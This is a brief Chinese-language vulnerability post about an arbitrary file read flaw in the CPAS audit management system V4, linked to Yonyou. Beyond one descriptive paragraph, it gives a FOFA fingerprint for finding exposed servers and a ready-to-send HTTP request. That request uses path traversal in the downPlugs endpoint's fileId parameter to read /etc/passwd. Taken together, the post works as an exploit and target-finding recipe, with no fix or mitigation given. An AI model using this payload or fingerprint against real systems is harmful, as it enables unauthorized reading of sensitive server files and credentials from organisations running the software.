漏洞描述
北京用友审计软件有限公司是由用友网络科技股份有限公司投资控股,专门致力于提供风险管理、内控评价、税务稽查及审计信息化软件产品、解决方案、管理咨询及技术服务的供应商,是用友集团产业布局中重要组成部分。北京友数聚科技有限公司CPAS审计管理系统V4存在任意文件读取漏洞,攻击者可以通过该漏洞获取服务器敏敏感文件信息。
CPAS审计管理系统存在任意文件读取漏洞
PoC代码
# CPAS审计管理系统存在任意文件读取漏洞
CPAS审计管理系统存在任意文件读取漏洞
## fofa
```javascript
icon_hash="-58141038"
```
## poc
```javascript
GET /cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName= HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
```